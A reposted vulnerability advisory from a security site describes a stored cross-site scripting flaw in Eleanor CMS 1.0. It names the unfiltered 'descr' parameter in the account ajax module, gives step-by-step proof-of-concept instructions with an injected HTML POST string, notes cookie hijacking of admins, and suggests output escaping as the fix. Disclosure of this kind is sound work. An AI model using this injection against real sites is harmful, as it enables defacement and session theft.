Eleanor 1.0 Stored Cross Site Scripting

2017.01.07
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

... ========================== - Discovered By : 0x3a - http://iran-cyber.net - 0x3a.taha[at]gmail.com - Credit To Iran Cyber Security Group - Release Date : 10.8.2016 - Level : High ========================== I.Vulnerability --------------- Eleanor 1.0 <= Stored Cross Site Scripting II.BackGround ------------- Eleanor is CMS that you make your website with it. eleanor-cms.ru eleanor-cms.ir a google search "intext:Powered+by+Eleanor+CMS" returned about 300.000 website hosted by ELEANOR. III.DESCRIPTION ---------------- Eleanor have security problem. it can be exploited by xss attack. This vulnerability occurs in /ELEANOR/modules/account/ajax/index.php. With this vulnerability you can inject your malicious code in website. These restrictions can be found in /ELEANOR/modules/account/ajax/index.php source file: [Line 69] $descr=isset($_REQUEST['descr']) ? Strings::CutStr(trim($_REQUEST['descr']),497) : ''; They used $_REQUEST function without any filter that make XSS vulnerability. With this vulnerability you can make cookie hijacking attack if admin see your profile. IV.PROOF OF CONCEPT EXPLOIT --------------------------- 1. Register in site that hosted by Eleanor CMS. 2. You can add address in your profile. 3. in description you can send your malicious code . POST Parameters : event=add_bookmark&title=0x3a&descr=<marquee><font size=8 color=red face="arial black">0x3a [Iran-Cyber.Net]</font></marquee>&href=iran-cyber.net&imp=1&value=&bmodule=0&module=account And you can run your payload in this parameter : [ descr ] Pic Test : goo.gl/CTr71D V.SYSTEM AFFECTED ----------------- All version of Eleanor CMS affected . VI.SOLUTION ----------- You can use filter function like as htmlspecialchars() , addslash() , htmlentities() to patch this vulnerability ---- 0x3a


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top